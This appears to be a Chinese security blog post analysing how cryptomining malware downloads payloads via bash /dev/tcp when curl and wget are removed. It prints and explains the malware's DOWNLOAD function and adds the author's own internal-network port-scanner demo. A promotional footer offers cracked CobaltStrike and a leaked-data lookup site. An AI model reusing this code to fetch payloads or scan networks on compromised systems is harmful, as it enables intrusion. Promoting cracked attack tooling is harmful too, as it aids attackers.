linux在没有curl和wget的情况下如何用shell实现下载功能
最近在分析挖矿木马,发现挖矿木马在入侵后都会对系统自带的部分命令进行替换或劫持。最常见的就是将 wget
和 curl
命令重命名。在多个挖矿木马同时竞争的情况下,没有 wget
和 curl
该如何远程下载挖矿脚本呢?
直接看挖矿脚本是如何实现的。这里面涵盖了很多知识点,非常值得学习!
function DOWNLOAD() {
read proto server path <<< "${1//"/"/ }"
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
while IFS= read -r line ; do
[[ "$line" == $'\r' ]] && break
done <&3
nul='\0'
while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
printf "%s$nul" "$x"
done <&3
exec 3>&-
}
为更好分析是如何实现下载的,我们用 bash -x
来执行脚本打印中间过程。这段 shell
脚本只是把远程服务器上的文件内容输出到屏幕,如果要写入文件可以用重定向符追加到文件。
用 read
读取第一个参数 url
解析赋值得到 path
,server
和 port
然后判断 host
和 port
的值是否相等。因为请求的 url
中可能不会带有端口号,此时匹配值就是相同的,该条件为真时就默认 port
为 80
端口。
有人会提问说:要按照上面的代码要请求是https也默认80端口不就报错了吗?
是的,这样只能实现最简单的 http
的请求,https
涉及到证书密钥的传输,实现起来过于复杂。在极端场景下,能实现 http
下载已经可以了。
为什么我上图中 url
参数用的 https
为何也请求成功了?
因为我博客同时允许了 http
和 https
共存,实际上面请求还是用的 http
协议(我也是后面才发现的),如果没有允许 http
协议这里就会报错。
[[ x"${HOST}" == x"${PORT}" ]]
为什么这个判断前面都要加个x呢?
示例:
if [ "x${var}" == "x" ]
if [ x"$DPVS_TYPE" == x"SNAT" ]
目的:防止出现语法错误。
因为如果不写 x
,只用 if [ "${var} == "0" ]
来判断 ${var}
的值; 当 ${var}
为空或未设置时,语句被解释为 if [ == "0" ]
,出现语法错误。加上 x
后,当 ${var}
为空或未设置时,解释为 if [ "x" == "x" ]
,依然正确。
所以:if [ "x${var}" == "x" ]
整句的意思是判断 ${var}
是否为空。
解释下 exec 3<>/dev/tcp/${HOST}/$PORT
的含义。
看到 /dev/tcp/${HOST}/$PORT
的第一反应就是想到用 bash
反弹 shell
,不知道做安全的小伙伴是不是这种感觉。
在 Bash Shell
中打开或关闭 TCP/UDP
套接字
可以使用 bash shell
中的以下语法打开 TCP/UDP
套接字。
$ exec ${file-descriptor} </dev/${protocol}/${host}/${port}
"文件描述符" 是与每个套接字相关联的唯一的非负整数。文件描述符0,1和2分别保留给 stdin
,stdout
和 stderr
。因此必须指定3或更高(以未使用者为准)作为文件描述符。
"<>"
意味着套接字对于读写都是打开的,根据需要,可以打开只读(<)或只写(>)的套接字。"协议"字段可以是 tcp
或 udp
打开后,可以使用以下语法关闭读/写套接字。
$ exec ${file-descriptor} <& – //关闭输入连接
$ exec ${file-descriptor}>& – //关闭输出连接
其中 echo
使用了 e
n
两个参数:
-e:开启转义
-n:默认echo会在最后输出最后加上一个\n换行,使用了该参数后就不会自动加上换行
因为在标准 http
协议中 header
和 body
是用 \r\n\r\n
分隔开的。
while IFS= read -r line ; do
[[ "$line" == $'\r' ]] && break
done <&3
-r
屏蔽 \
,如果没有该选项,则 \
作为一个转义字符,有的话 \
就是个正常的字符了。
这里就是按行读取 header
部分,匹配到 \r
就停止读取了。
shell – IFS
分隔符,IFS
是 internal field separator
的缩写,shell
的特殊环境变量。ksh
根据 IFS
存储的值,可以是空格、tab
、换行符或者其他自定义符号,来解析输入和输出的变量值。
nul='\0'
while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
printf "%s$nul" "$x"
done <&3
exec 3>&-
read -d
后面跟一个标志符,其实只有其后的第一个字符有用,作为结束的标志。
这里就是读取 body
部分。exec 3>&-
关闭输出 fd3
短短几行 shell
代码就实现了 linux
的下载功能。并且这里下载需要将结果追加到文件。
下载文件并解压成功
举一反三:
既然在没有 curl
和 wget
的情况下用 shell
实现了下载,那么同样可以借此实现其他功能。
思考一个场景,如果我是挖矿木马的开发者,在内网的情况下没法下载扫描工具的源码(如 masscan
)进行编译时候可以用同样的方式来扫描内网呢?
下面是我的思路,一个简单的 demo
:
#!/bin/bash
host=$1
port_first=1
port_last=65535
for ((port=$port_first; port<=$port_last; port++))
do
$(echo >/dev/tcp/$host/$port) >/dev/null 2>&1 && echo "$port open"
done
本文作者:Zgao
原文地址:https://zgao.top/linux%e5%9c%a8%e6%b2%a1%e6%9c%89curl%e5%92%8cwget%e7%9a%84%e6%83%85%e5%86%b5%e4%b8%8b%e5%a6%82%e4%bd%95%e7%94%a8shell%e5%ae%9e%e7%8e%b0%e4%b8%8b%e8%bd%bd%e5%8a%9f%e8%83%bd/
关注公众号后台回复 0001
领取域渗透思维导图,0002
领取VMware 17永久激活码,0003
获取SGK地址,0004
获取在线ChatGPT地址,0005
获取 Windows10渗透集成环境,0006
获取 CobaltStrike 4.9.1破解版
加我微信好友,邀请你进交流群
往期推荐
对某金融App的加解密hook+rpc+绕过SSLPinning抓包
疑似境外黑客组织对CSDN、吾爱破解、bilibili等网站发起DDoS攻击
Fofa新产品 - 绕CDN溯源真实IP!
Cobalt Strike 4.8 正式发布上线!
团队在线Windows进程识别正式内测
突发!微信疑似存在RCE
实战下的内网中继攻击问题
对某菠菜的渗透测试笔记
绕过AV进行UserAdd的方法总结及实现
某次近源攻击到内网漫游拿下域控以及Vcenter
某次以目的为导向的内网渗透-取开发源码
使用腾讯混元LLM辅助红队代码能力建设
APT29利用CVE-2023-38831攻击大使馆
对某app的加密定位与hook
《永结无间》客户端RCE漏洞
微信PC客户端存在@全体逻辑错误
NSA组织"二次约会"间谍软件功能复现及加解密分析
发现新恶意团伙"紫狐"!针对finalshell的供应链事件
Juniper 新洞 CVE-2023-36845 浅析
备用号,欢迎关注